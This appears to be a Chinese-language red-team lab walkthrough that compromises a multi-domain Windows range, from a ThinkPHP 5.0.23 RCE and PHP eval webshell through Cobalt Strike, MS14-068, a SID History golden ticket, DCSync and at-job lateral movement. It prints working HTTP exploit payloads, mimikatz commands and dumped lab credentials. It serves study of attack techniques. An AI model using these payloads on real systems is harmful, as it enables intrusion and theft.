“ 本次靶场相较于前两篇文章稍复杂一些,考察的也是不同的漏洞利用方法,可用于熟悉一些域内提权、跨域攻击、深入信息收集方法,文章仅供学习参考,大佬勿喷。本期文章靶场来自公众号:渗透攻击红队。”
声明:本文章仅对个人学习过程进行记录总结,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
01
—
环境简介
-
攻击机:
-
Windows 10:172.20.4.137
-
Kali Linux:172.20.4.153
-
靶机:
-
Windows Server 2016:172.20.4.24、10.0.1.16
-
Windows Server 2008:10.0.1.8
-
Windows Server 2008:10.0.0.8
-
Windows 7:10.0.0.7
02
—
外网打点
ThinkPHP 5.0.23 RCE
浏览器访问目标ip
tp5框架,使用检测工具进行批量漏洞检测
检测到存在ThinkPHP 5.0.23 RCE,尝试命令执行
命令执行完成并没有得到回显,尝试抓包手工测试poc
POST /?s=captcha&test=-1 HTTP/1.1Host: 172.20.4.24Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 73_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
phpinfo可以正常执行,测试一下执行系统命令whomai
POST /?s=captcha&test=-1 HTTP/1.1Host: 172.20.4.24Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 77_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
发现并没有得到回显,在phpinfo界面中查看disable_functions发现禁用了很多函数
可以执行系统命令的函数:
system()passthru()exec()shell_exec()popen()proc_open()pcntl_exec()
发现passthru()没有被禁,利用这个函数尝试执行系统命令
POST /?s=captcha&test=-1 HTTP/1.1Host: 172.20.4.24Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 79_method=__construct&filter[]=passthru&method=get&server[REQUEST_METHOD]=whoami
成功RCE,得到当前用户为webserveradministrator
写入一句话木马到网站目录
POST /?s=captcha&test=-1 HTTP/1.1Host: 172.20.4.24Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 139_method=__construct&filter[]=passthru&method=get&server[REQUEST_METHOD]=echo+"<%3fphp+%40eval($_POST['hacker'])%3bphpinfo()%3b%3f>"+>+shell.php
蚁剑连接
上传CS后门到当前目录
打开终端运行后门程序
成功上线CS,本地管理员权限
03
—
内网渗透
内网信息收集
查看当前机器网络配置信息
shell ipconfig /allTasked beacon to run: ipconfig /allhost called home, sent: 44 bytesreceived output:Windows IP 配置. . . . . . . . . . . . . : webserverDNS 后缀 . . . . . . . . . . . : root.redteam.lab. . . . . . . . . . . . : 混合IP 路由已启用 . . . . . . . . . . : 否WINS 代理已启用 . . . . . . . . . : 否DNS 后缀搜索列表 . . . . . . . . : root.redteam.labredteam.labEthernet0:DNS 后缀 . . . . . . . :. . . . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection. . . . . . . . . . . . : 00-0C-29-A7-C3-F2DHCP 已启用 . . . . . . . . . . . : 是. . . . . . . . . : 是IPv6 地址. . . . . . . . : fe80::9827:445a:52b5:1a04%3(首选)IPv4 地址 . . . . . . . . . . . . : 172.20.4.24(首选). . . . . . . . . . . . : 255.255.252.0. . . . . . . . . : 2024年3月30日 9:33:50. . . . . . . . . : 2024年4月1日 9:33:50. . . . . . . . . . . . : 172.20.7.254DHCP 服务器 . . . . . . . . . . . : 172.31.255.4DHCPv6 IAID . . . . . . . . . . . : 50334761DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-2D-99-24-56-00-0C-29-A7-C3-F2DNS 服务器 . . . . . . . . . . . : 172.31.255.5211.142.211.124TCPIP 上的 NetBIOS . . . . . . . : 已启用Ethernet1:DNS 后缀 . . . . . . . :. . . . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2. . . . . . . . . . . . : 00-0C-29-A7-C3-FCDHCP 已启用 . . . . . . . . . . . : 否. . . . . . . . . : 是IPv6 地址. . . . . . . . : fe80::f160:e860:f589:3ae5%5(首选)IPv4 地址 . . . . . . . . . . . . : 10.0.1.16(首选). . . . . . . . . . . . : 255.255.0.0. . . . . . . . . . . . : 10.0.0.1DHCPv6 IAID . . . . . . . . . . . : 117443625DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-2D-99-24-56-00-0C-29-A7-C3-F2DNS 服务器 . . . . . . . . . . . : 10.0.1.88.8.8.8TCPIP 上的 NetBIOS . . . . . . . : 已启用isatap.{4268B001-82D4-417B-BDF7-D963D6B426EC}:. . . . . . . . . . . . : 媒体已断开连接DNS 后缀 . . . . . . . :. . . . . . . . . . . . . . : Microsoft ISATAP Adapter. . . . . . . . . . . . : 00-00-00-00-00-00-00-E0DHCP 已启用 . . . . . . . . . . . : 否. . . . . . . . . : 是isatap.{97AF06A8-9183-4F82-86A5-A7CFEDF16BD5}:. . . . . . . . . . . . : 媒体已断开连接DNS 后缀 . . . . . . . :. . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2. . . . . . . . . . . . : 00-00-00-00-00-00-00-E0DHCP 已启用 . . . . . . . . . . . : 否. . . . . . . . . : 是Teredo Tunneling Pseudo-Interface:. . . . . . . . . . . . : 媒体已断开连接DNS 后缀 . . . . . . . :. . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface. . . . . . . . . . . . : 00-00-00-00-00-00-00-E0DHCP 已启用 . . . . . . . . . . . : 否. . . . . . . . . : 是
可以看到当前机器在root.redteam.lab域中,还有一张IP为10.0.1.16的网卡
抓取一下登录密码
没有得到明文,有一个域用户ROOTxiaowang
查看当前机器上的进程
也没有域管权限的进程
尝试到在线网站上去解密一下ROOTxiaowang的密码哈希
得到明文密码为Xiao123
上传nbtscan扫描一下10.0.1.0/24
beacon> shell nbtscan.exe 10.0.1.0/24[] Tasked beacon to run: nbtscan.exe 10.0.1.0/24[] host called home, sent: 54 bytes[] received output:Doing NBT name scan for addresses from 10.0.1.0/24IP address NetBIOS Name Server User MAC address------------------------------------------------------------------------------10.0.1.8 ROOT-AD <server> <unknown> 00-0c-29-4a-a0-c7
该C段下只有一台机器ROOT-AD,IP为10.0.1.8
上传fscan扫描
[*] Tasked beacon to run: fscan.exe -h 10.0.1.0/24[+] host called home, sent: 42 bytes[+] received output:___ _/ _ ___ ___ _ __ __ _ ___| | __/ /_/____/ __|/ __| '__/ _` |/ __| |/ // /_\_______ (__| | | (_| | (__| <____/ |___/___|_| __,_|___|_|_fscan version: 1.8.1start infoscan(icmp) Target 10.0.1.8 is alive(icmp) Target 10.0.1.16 is alive[*] Icmp alive hosts len is: 210.0.1.8:88 open10.0.1.16:3306 open10.0.1.16:445 open10.0.1.8:445 open10.0.1.16:139 open10.0.1.8:139 open10.0.1.16:135 open10.0.1.8:135 open10.0.1.16:80 open[*] alive ports len is: 9start vulscan[+] NetInfo:[*]10.0.1.16[->]webserver[->]172.20.4.24[->]10.0.1.16[+] NetInfo:[*]10.0.1.8[->]ROOT-AD[->]10.0.1.8[*] 10.0.1.8 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)[*] 10.0.1.8 [+]DC ROOTROOT-AD Windows Server 2008 R2 Enterprise 7601 Service Pack 1[*] WebTitle:http://10.0.1.16 code:200 len:931 title:None2024/03/30 12:39:44 Unsolicited response received on idle HTTP channel starting with "xfdx94xbdxa5xafIxef)xfaaxfexc7Dxcaxe6xbexe3,xb0u007fxacxceX}\xffx03xdb3Exef4x19>%x00x00x00x00IENDxaeB`x82"; err=<nil>[+] http://10.0.1.16 poc-yaml-thinkphp5023-method-rce poc1
可以看到域控机器是Windows Server 2008 R2系统
MS14-068攻击上线子域控
进行MS14-068攻击需要的条件:
-
目标主机没打相应补丁
-
域内任意用户SID
-
域内任意用户密码
-
系统版本为Windows 2008及以下
第一个条件目前尚不清楚,但是已经得到了域用户ROOTxiaowang:Xiao123可以尝试进行MS14-068攻击
之前在进程中可以看到有以ROOTxiaowang身份运行的进程,直接进程注入获取一个xiaowang用户权限的会话
查看一下当前用户的SID
beacon> shell whoami /user[] Tasked beacon to run: whoami /user[] host called home, sent: 43 bytes[] received output:用户信息----------------用户名 SID============= =============================================rootxiaowang S-1-5-21-252626755-3360192561-2172417258-1104
EXP:https://github.com/abatchy17/WindowsExploits/blob/master/MS14-068/MS14-068.exe
上传MS14-068.exe到目标机器,执行生成TGT票据
beacon> shell MS14-068.exe -u [email protected] -p Xiao123 -s S-1-5-21-252626755-3360192561-2172417258-1104 -d 10.0.1.8[] Tasked beacon to run: MS14-068.exe -u [email protected] -p Xiao123 -s S-1-5-21-252626755-3360192561-2172417258-1104 -d 10.0.1.8[] host called home, sent: 144 bytes[] received output:[] Building AS-REQ for 10.0.1.8... Done![] Sending AS-REQ to 10.0.1.8... Done![] Receiving AS-REP from 10.0.1.8... Done![] Parsing AS-REP from 10.0.1.8... Done![] Building TGS-REQ for 10.0.1.8... Done![] Sending TGS-REQ to 10.0.1.8... Done![] Receiving TGS-REP from 10.0.1.8... Done![] Parsing TGS-REP from 10.0.1.8... Done![] Creating ccache file '[email protected]'... Done!
在当前目录下生成了[email protected]票据文件
上传mimikatz,使用mimikatz将票据注入到当前内存中,伪造凭证
beacon> shell mimikatz.exe "kerberos::purge" "kerberos::ptc [email protected]" "exit"[] Tasked beacon to run: mimikatz.exe "kerberos::purge" "kerberos::ptc [email protected]" "exit"[] host called home, sent: 121 bytes[] received output:..'## v ##' Vincent LE TOUX ( [email protected] )'#####' > http://pingcastle.com / http://mysmartlogon.com ***/mimikatz(commandline) # kerberos::purgeTicket(s) purge for current session is OKmimikatz(commandline) # kerberos::ptc [email protected]Principal : (01) : xiaowang ; @ ROOT.REDTEAM.LABData 0Start/End/MaxRenew: 2024/3/30 13:02:38 ; 2024/3/30 23:02:38 ; 2024/4/6 13:02:38Service Name (01) : krbtgt ; ROOT.REDTEAM.LAB ; @ ROOT.REDTEAM.LABTarget Name (01) : krbtgt ; ROOT.REDTEAM.LAB ; @ ROOT.REDTEAM.LABClient Name (01) : xiaowang ; @ ROOT.REDTEAM.LABFlags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ;Session Key : 0x00000017 - rc4_hmac_nt35c5bdca62dfe216e9b14d486073b697Ticket : 0x00000000 - null ; kvno = 2 [...]* Injecting ticket : OKmimikatz(commandline) # exitBye!
查看当前缓存的票据
beacon> shell klist[*] Tasked beacon to run: klist[+] host called home, sent: 36 bytes[+] received output:当前登录 ID 是 0:0x3e7缓存的票证: (1)#0> 客户端: xiaowang @ ROOT.REDTEAM.LAB服务器: krbtgt/ROOT.REDTEAM.LAB @ ROOT.REDTEAM.LABKerberos 票证加密类型: RSADSI RC4-HMAC(NT)票证标志 0x50a00000 -> forwardable proxiable renewable pre_authent开始时间: 3/30/2024 13:02:38 (本地)结束时间: 3/30/2024 23:02:38 (本地)续订时间: 4/6/2024 13:02:38 (本地)会话密钥类型: RSADSI RC4-HMAC(NT)缓存标志: 0x1 -> PRIMARY调用的 KDC:
此时就可以dir访问域控了,使用IP可能会拒绝访问,直接使用主机名
beacon> shell dir \10.0.1.8c$[] Tasked beacon to run: dir \10.0.1.8c$[] host called home, sent: 48 bytes[] received output:拒绝访问。beacon> shell dir \root-adc$[] Tasked beacon to run: dir \root-adc$[] host called home, sent: 47 bytes[] received output:驱动器 \root-adc$ 中的卷没有标签。卷的序列号是 7A33-DAED\root-adc$ 的目录2009/07/14 11:20 <DIR> PerfLogs2024/03/30 09:48 <DIR> Program Files2023/02/13 17:48 <DIR> Program Files (x86)2023/02/13 17:37 <DIR> Users2024/03/30 10:03 <DIR> Windows0 个文件 0 字节5 个目录 34,407,501,824 可用字节
在WEBSERVER机器上设置转发上线监听器
生成可执行程序后门zhuanfa1.exe
先上传到WEBSERVER机器
再copy到ROOT-AD机器的C盘
beacon> shell copy zhuanfa1.exe \root-adc$[] Tasked beacon to run: copy zhuanfa1.exe \root-adc$[] host called home, sent: 61 bytes[] received output:已复制 1 个文件。beacon> shell dir \root-adc$[] Tasked beacon to run: dir \root-adc$[] host called home, sent: 47 bytes[] received output:驱动器 \root-adc$ 中的卷没有标签。卷的序列号是 7A33-DAED\root-adc$ 的目录2009/07/14 11:20 <DIR> PerfLogs2024/03/30 09:48 <DIR> Program Files2023/02/13 17:48 <DIR> Program Files (x86)2023/02/13 17:37 <DIR> Users2024/03/30 10:03 <DIR> Windows2024/03/30 13:30 295,936 zhuanfa1.exe
上传PsExec到WEBSERVER机器,执行后门程序
注意是PSTools的PsExec,er非impacket的psexec
beacon> shell psexec.exe -accepteula \root-ad -s c:zhuanfa1.exe[*] Tasked beacon to run: psexec.exe -accepteula \root-ad -s c:zhuanfa1.exe[+] host called home, sent: 82 bytes[+] established link to child beacon: 10.0.1.8[+] received output:PsExec v2.34 - Execute processes remotelyCopyright (C) 2001-2021 Mark RussinovichSysinternals - www.sysinternals.com
成功上线ROOT-AD机器,SYSTEM权限
查看ROOT-AD机器的网络配置信息
shell ipconfig /allTasked beacon to run: ipconfig /allhost called home, sent: 44 bytesreceived output:Windows IP 配置. . . . . . . . . . . . . : ROOT-ADDNS 后缀 . . . . . . . . . . . : root.redteam.lab. . . . . . . . . . . . : 混合IP 路由已启用 . . . . . . . . . . : 否WINS 代理已启用 . . . . . . . . . : 否DNS 后缀搜索列表 . . . . . . . . : root.redteam.labredteam.lab本地连接:DNS 后缀 . . . . . . . :. . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection. . . . . . . . . . . . : 00-0C-29-4A-A0-C7DHCP 已启用 . . . . . . . . . . . : 否. . . . . . . . . : 是IPv4 地址 . . . . . . . . . . . . : 10.0.1.8(首选). . . . . . . . . . . . : 255.255.0.0. . . . . . . . . . . . : 10.0.0.1DNS 服务器 . . . . . . . . . . . : 10.0.1.810.0.0.810.0.1.8TCPIP 上的 NetBIOS . . . . . . . : 已启用isatap.{B54B1F7C-145C-4729-B88C-E50F2801061D}:. . . . . . . . . . . . : 媒体已断开DNS 后缀 . . . . . . . :. . . . . . . . . . . . . . : Microsoft ISATAP Adapter. . . . . . . . . . . . : 00-00-00-00-00-00-00-E0DHCP 已启用 . . . . . . . . . . . : 否. . . . . . . . . : 是
虽然显示只有一张网卡IP为10.0.1.8,但是在Windows IP配置可以看到DNS后缀搜索列表中还有一个redteam.lab,当前拿到的域控应该是子域的域控,还有父域
子网掩码为255.255.0.0说明当前机器与B段下的其他机器可能互通
查看ARP缓存表
beacon> shell arp -a[*] Tasked beacon to run: arp -a[+] host called home, sent: 37 bytes[+] received output:接口: 10.0.1.8 --- 0xbInternet 地址 物理地址 类型10.0.0.7 00-0c-29-7f-f7-79 动态10.0.0.8 00-0c-29-fc-0e-1d 动态10.0.1.16 00-0c-29-a7-c3-fc 动态
可以发现还有10.0.0.7和10.0.0.8两台机器,分别ping一下
beacon> shell ping 10.0.0.7[] Tasked beacon to run: ping 10.0.0.7[] host called home, sent: 44 bytes[] received output:正在 Ping 10.0.0.7 具有 32 字节的数据:请求超时。请求超时。请求超时。请求超时。10.0.0.7 的 Ping 统计信息:数据包: 已发送 = 4,已接收 = 0,丢失 = 4 (100% 丢失),beacon> shell ping 10.0.0.8[] Tasked beacon to run: ping 10.0.0.8[] host called home, sent: 44 bytes[] received output:正在 Ping 10.0.0.8 具有 32 字节的数据:来自 10.0.0.8 的回复: 字节=32 时间=1ms TTL=128来自 10.0.0.8 的回复: 字节=32 时间=1ms TTL=128来自 10.0.0.8 的回复: 字节=32 时间=2ms TTL=128来自 10.0.0.8 的回复: 字节=32 时间=2ms TTL=12810.0.0.8 的 Ping 统计信息:数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),往返行程的估计时间(以毫秒为单位):最短 = 1ms,最长 = 2ms,平均 = 1ms
只能ping通10.0.0.8
上传fscan扫描一下b段
beacon> shell fscan.exe -h 10.0.0.1/16[*] Tasked beacon to run: fscan.exe -h 10.0.0.1/16[+] host called home, sent: 55 bytes[+] received output:___ _/ _ ___ ___ _ __ __ _ ___| | __/ /_/____/ __|/ __| '__/ _` |/ __| |/ // /_\_______ (__| | | (_| | (__| <____/ |___/___|_| __,_|___|_|_fscan version: 1.8.1start infoscan(icmp) Target 10.0.0.8 is alive(icmp) Target 10.0.1.8 is alive(icmp) Target 10.0.1.16 is alive[*] LiveTop 10.0.0.0/16 段存活数量为: 3[*] LiveTop 10.0.1.0/24 段存活数量为: 2[*] LiveTop 10.0.0.0/24 段存活数量为: 110.0.0.8:80 open10.0.0.8:808 open10.0.0.8:88 open10.0.1.8:88 open10.0.1.16:3306 open10.0.0.8:445 open10.0.1.16:445 open10.0.1.8:445 open10.0.0.8:443 open10.0.1.16:139 open10.0.1.8:139 open10.0.0.8:139 open10.0.1.16:135 open10.0.1.8:135 open10.0.0.8:135 open10.0.1.16:80 open[+] NetInfo:[*]10.0.1.8[->]ROOT-AD[->]10.0.1.8[*] 10.0.1.8 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)[+] NetInfo:[*]10.0.0.8[->]owa[->]10.0.0.8[*] 10.0.1.8 [+]DC ROOTROOT-AD Windows Server 2008 R2 Enterprise 7601 Service Pack 1[*] 10.0.0.8 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)[*] 10.0.0.8 [+]DC REDTEAMOWA Windows Server 2008 R2 Enterprise 7601 Service Pack 1[+] NetInfo:[*]10.0.1.16[->]webserver[->]172.20.4.24[->]10.0.1.16[*] WebTitle:http://10.0.0.8 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。[*] WebTitle:https://10.0.0.8 code:200 len:689 title:IIS7[*] 10.0.1.16 ROOTWEBSERVER Windows Server 2016 Datacenter 14393[*] WebTitle:http://10.0.1.16 code:200 len:931 title:None[+] http://10.0.1.16 poc-yaml-thinkphp5023-method-rce poc1
可以得到当前拿到的ROOT-AD机器为root.redteam.lab的域控,OWA为redteam.lab的域控,而root.redteam.lab为redteam.lab的子域
查询域信任关系
beacon> shell nltest /domain_trusts[] Tasked beacon to run: nltest /domain_trusts[] host called home, sent: 52 bytes[] received output:域信任的列表:0: REDTEAM redteam.lab (NT 5) (Forest Tree Root) (Direct Outbound) (Direct Inbound) ( Attr: 0x20 )1: ROOT root.redteam.lab (NT 5) (Forest: 0) (Primary Domain) (Native)此命令成功完成
可以看到子域和父域存在双向信任关系
Sid History跨域攻击上线父域控
Sid History 攻击需要:
-
域名称
-
域的SID值
-
域的KRBTGT账户的hash
-
伪造用户名
-
根域Enterprise Admins组的ObjectID
上传PowerView.ps1并导入
shell powershell -exec bypass "import-module C:windowstempPowerview.ps1"查看当前域名
powershell Get-DomainTasked beacon to run: Get-Domainhost called home, sent: 297 bytesreceived output:Forest : redteam.labDomainControllers : {ROOT-AD.root.redteam.lab}Children : {}DomainMode : Windows2003DomainParent : redteam.labPdcRoleOwner : ROOT-AD.root.redteam.labRidRoleOwner : ROOT-AD.root.redteam.labInfrastructureRoleOwner : ROOT-AD.root.redteam.labName : root.redteam.lab
查看当前域的SID
beacon> powershell Get-DomainSID[] Tasked beacon to run: Get-DomainSID[] host called home, sent: 305 bytes[] received output:S-1-5-21-252626755-3360192561-2172417258
获取KRBTGT账户的hash
beacon> hashdump[*] Tasked beacon to dump hashes[+] host called home, sent: 82541 bytes[+] received password hashes:Administrator:500:aad3b435b51404eeaad3b435b51404ee:881aa97cfd3446f82f97f3a847b79e26:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:105fc86a0f24896464a4772748051789:::xiaowang:1104:aad3b435b51404eeaad3b435b51404ee:2da2a4991d15033319d15eb780372184:::adduser:1105:aad3b435b51404eeaad3b435b51404ee:168df3659b5f75ab35645606839e5677:::ROOT-AD$:1000:aad3b435b51404eeaad3b435b51404ee:dcc5bcec45937401c1c7b7038655cd79:::WEBSERVER$:1106:aad3b435b51404eeaad3b435b51404ee:eed339c640e4fd291eb1ca80ca5e595a:::REDTEAM$:1101:aad3b435b51404eeaad3b435b51404ee:2761565f91ac05e8d6beac55fa1c6997:::
获取根域Enterprise Admins组的ObjectID
beacon> powershell Convert-NameToSid redteamkrbtgt[] Tasked beacon to run: Convert-NameToSid redteamkrbtgt[] host called home, sent: 357 bytes[] received output:S-1-5-21-3044561657-3490269564-1163119649-502
汇总信息:
root.redteam.labS-1-5-21-252626755-3360192561-2172417258105fc86a0f24896464a4772748051789administrator# 获取到krbtgt的SID后,需要将502修改为519,也就是Enterprise Admins组S-1-5-21-3044561657-3490269564-1163119649-519
使用mimikatz注入票据
mimikatz kerberos::golden /user:administrator /domain:root.redteam.lab /sid:S-1-5-21-252626755-3360192561-2172417258 /krbtgt:105fc86a0f24896464a4772748051789 /sids:S-1-5-21-3044561657-3490269564-1163119649-519 /pttTasked beacon to run mimikatz's kerberos::golden /user:administrator /domain:root.redteam.lab /sid:S-1-5-21-252626755-3360192561-2172417258 /krbtgt:105fc86a0f24896464a4772748051789 /sids:S-1-5-21-3044561657-3490269564-1163119649-519 /ptt commandhost called home, sent: 788082 bytesreceived output:User : administratorDomain : root.redteam.lab (ROOT)SID : S-1-5-21-252626755-3360192561-2172417258User Id : 500Groups Id : *513 512 520 518 519Extra SIDs: S-1-5-21-3044561657-3490269564-1163119649-519 ;ServiceKey: 105fc86a0f24896464a4772748051789 - rc4_hmac_ntLifetime : 2024/3/30 15:08:34 ; 2034/3/28 15:08:34 ; 2034/3/28 15:08:34Ticket : ** Pass The Ticket **PAC generatedPAC signedEncTicketPart generatedEncTicketPart encryptedKrbCred generatedGolden ticket for 'administrator @ root.redteam.lab' successfully submitted for current sessionshell dir \owac$Tasked beacon to run: dir \owac$host called home, sent: 43 bytesreceived output:\owac$ 中的卷没有标签。6657-6FBD的目录14:48 <DIR> ExchangeSetupLogs16:28 <DIR> inetpub11:20 <DIR> PerfLogs09:52 <DIR> Program Files14:10 <DIR> Program Files (x86)13:28 <DIR> Users09:54 <DIR> Windows0 个文件 0 字节7 个目录 23,132,299,264 可用字节
此时就可以访问到父域控的C盘了
将后门程序zhuanfa1.exe复制到OWA的C盘
beacon> shell copy zhuanfa1.exe \owac$[] Tasked beacon to run: copy zhuanfa1.exe \owac$[] host called home, sent: 57 bytes[] received output:已复制 1 个文件。
查看一下当前域内时间并使用at设置定时任务执行后门
beacon> shell net time /domain[] Tasked beacon to run: net time /domain[] host called home, sent: 47 bytes[] received output:\ROOT-AD.root.redteam.lab 的当前时间是 2024/3/30 15:14:27命令成功完成。beacon> shell at \owa 15:15 C:zhuanfa1.exe[] Tasked beacon to run: at \owa 15:15 C:zhuanfa1.exe[] host called home, sent: 61 bytes[] received output:新加了一项作业,其作业 ID = 1
稍微等待一会父域控OWA就成功上线到CS
抓取密码
mimikatz sekurlsa::logonpasswordsTasked beacon to run mimikatz's sekurlsa::logonpasswords commandhost called home, sent: 788090 bytesreceived output:Authentication Id : 0 ; 955543 (00000000:000e9497)Session : Interactive from 1User Name : AdministratorDomain : REDTEAMLogon Server : OWALogon Time : 2024/3/30 9:52:39SID : S-1-5-21-3044561657-3490269564-1163119649-500msv :PrimaryUsername : AdministratorDomain : REDTEAMNTLM : ad5a870327c02f83cb947af6a94a4c23SHA1 : 8eb76d4d7d8d07f4fe525f4e7f70379a68953681CredentialKeysNTLM : ad5a870327c02f83cb947af6a94a4c23SHA1 : 8eb76d4d7d8d07f4fe525f4e7f70379a68953681tspkg :wdigest :Username : AdministratorDomain : REDTEAMPassword : admin!@#456kerberos :Username : administratorDomain : REDTEAM.LABPassword : admin!@#456ssp :credman :
得到域管理员用户REDTEAMAdministrator的明文密码admin!@#456
最终的目标是拿到渗透攻击红队公司下财务部门主管liuyuan的个人电脑权限,并且获取到相应的Flag
导出域内所有用户密码哈希
mimikatz lsadump::dcsync /domain:redteam.lab /all /csvTasked beacon to run mimikatz's lsadump::dcsync /domain:redteam.lab /all /csv commandhost called home, sent: 788081 bytesreceived output:'redteam.lab' will be the domain'owa.redteam.lab' will be the DC serverExporting domain 'redteam.lab'Service : ldapAuthnSvc : GSS_NEGOTIATE (9)502 krbtgt 7f83b52bdbfbe4bb39277eda6d0022b2 5141126 mail 38fe728ae616f0fde13715e7c320685f 660481137 adduser 168df3659b5f75ab35645606839e5677 660481138 webserver 0b564247267bce0a40cae80e575b9f64 660481127 zhangfei ccef208c6485269c20db2cad21734fe7 660481133 saulgoodman ccef208c6485269c20db2cad21734fe7 660481134 ak47 ccef208c6485269c20db2cad21734fe7 660481128 lisi ccef208c6485269c20db2cad21734fe7 660481135 uzi ccef208c6485269c20db2cad21734fe7 660481132 zhoutian ccef208c6485269c20db2cad21734fe7 660481129 justinBieber ccef208c6485269c20db2cad21734fe7 660481130 zhangwen ccef208c6485269c20db2cad21734fe7 660481142 test ccef208c6485269c20db2cad21734fe7 66048500 Administrator ad5a870327c02f83cb947af6a94a4c23 5121131 liuyuan ae4c0d5fb959fda8f4cb1d14a8376af4 660481140 WORK$ 1a4f05e3d110a6ae3f21de304058618f 40961141 ROOT$ dc6ff1604ac5834d875069233f61b88d 20801000 OWA$ fc1bf2d30219e31a032bac9dd3eb14a0 532480
可以得到liuyuan:ae4c0d5fb959fda8f4cb1d14a8376af4
根据域用户名定位登陆机器
在Windows系统中,用户登录成功会在日志中记录一条事件ID为4624的记录
导出相关日志:
shell wevtutil epl Security c:windowslogsrisalogs.evtx /q:"*[EventData[Data[@Name='LogonType']='3'] and System[(EventID=4624) and TimeCreated[timediff(@SystemTime) <= 4449183132]]]"在C:WindowsLogs目录找到risalogs.evtx
将risalogs.evtx下载到本地,使用logparser读取并转换格式
https://www.microsoft.com/en-us/download/details.aspx?id=24659
LogParser.exe -i:EVT -o csv "SELECT TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) as NAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) as IP FROM risalogs.evtx" > log.txt得到log.txt
到Kali中筛选一下文本内容
grep -v '$' log.txt | sort | uniq | egrep -v 'ANONYMOUS LOGIN|-|:' > login_succeed.txt
可以看到用户liuyuan登录了10.0.0.7这台机器
IPC攻击上线个人机器
使用域管理员用户与10.0.0.7建立IPC连接
beacon> shell net use \10.0.0.7 /u:redteamadministrator admin!@[] Tasked beacon to run: net use \10.0.0.7 /u:redteamadministrator admin!@[] host called home, sent: 86 bytes[] received output:命令成功完成。beacon> shell dir \10.0.0.7c$[] Tasked beacon to run: dir \10.0.0.7c$[] host called home, sent: 48 bytes[] received output:驱动器 \10.0.0.7c$ 中的卷没有标签。卷的序列号是 DC36-D173\10.0.0.7c$ 的目录2009/07/14 11:20 <DIR> PerfLogs2024/03/30 09:47 <DIR> Program Files2023/02/13 17:36 <DIR> Program Files (x86)2023/02/13 17:31 <DIR> Users2024/03/30 09:47 <DIR> Windows0 个文件 0 字节5 个目录 26,022,121,472 可用字节
父域控设置转发上线监听器
生成后门zhuanfa2.exe
先上传到父域控,再copy到10.0.0.7
beacon> shell copy zhuanfa2.exe \10.0.0.7c$[] Tasked beacon to run: copy zhuanfa2.exe \10.0.0.7c$[] host called home, sent: 62 bytes[] received output:已复制 1 个文件。beacon> shell dir \10.0.0.7c$[] Tasked beacon to run: dir \10.0.0.7c$[] host called home, sent: 48 bytes[] received output:驱动器 \10.0.0.7c$ 中的卷没有标签。卷的序列号是 DC36-D173\10.0.0.7c$ 的目录2009/07/14 11:20 <DIR> PerfLogs2024/03/30 09:47 <DIR> Program Files2023/02/13 17:36 <DIR> Program Files (x86)2023/02/13 17:31 <DIR> Users2024/03/30 09:47 <DIR> Windows2024/03/30 16:22 295,936 zhuanfa2.exe1 个文件 295,936 字节5 个目录 26,021,822,464 可用字节
查看目标系统时间,at设置定时任务在10.0.0.7上执行zhuanfa2.exe
beacon> shell net time \10.0.0.7[] Tasked beacon to run: net time \10.0.0.7[] host called home, sent: 50 bytes[] received output:\10.0.0.7 的当前时间是 2024/3/30 16:27:10命令成功完成。beacon> shell at \10.0.0.7 16:28 C:zhuanfa2.exe[] Tasked beacon to run: at \10.0.0.7 16:28 C:zhuanfa2.exe[] host called home, sent: 66 bytes[] received output:新加了一项作业,其作业 ID = 1
WORK机器成功上线CS
至此整个靶场环境所有机器均已拿下
远程桌面登录获取flag
抓取密码
